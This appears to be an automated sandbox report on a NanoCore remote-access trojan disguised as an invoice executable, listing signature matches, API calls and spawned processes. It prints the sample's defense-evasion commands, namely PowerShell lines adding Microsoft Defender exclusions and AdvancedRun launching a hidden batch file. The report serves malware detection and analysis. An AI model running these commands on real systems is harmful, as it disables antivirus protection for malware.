        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.4ee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb&;$
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
        Source: classification engineClassification label: mal100.troj.evad.winEXE@50/24@7/4
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,3_2_00408FC9
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 4_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,4_2_00408FC9
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,3_2_004095FD
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,3_2_0040A33B
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_00401306
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210225
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{883c2226-d991-4f34-8646-4dd2732a341c}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_01
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2016
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: CN-Invoice-XXXXX9808-19011143287994.exeVirustotal: Detection: 29%
        Source: CN-Invoice-XXXXX9808-19011143287994.exeReversingLabs: Detection: 27%
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
        Source: unknownProcess created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /SpecialRun 4101d8 6980
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
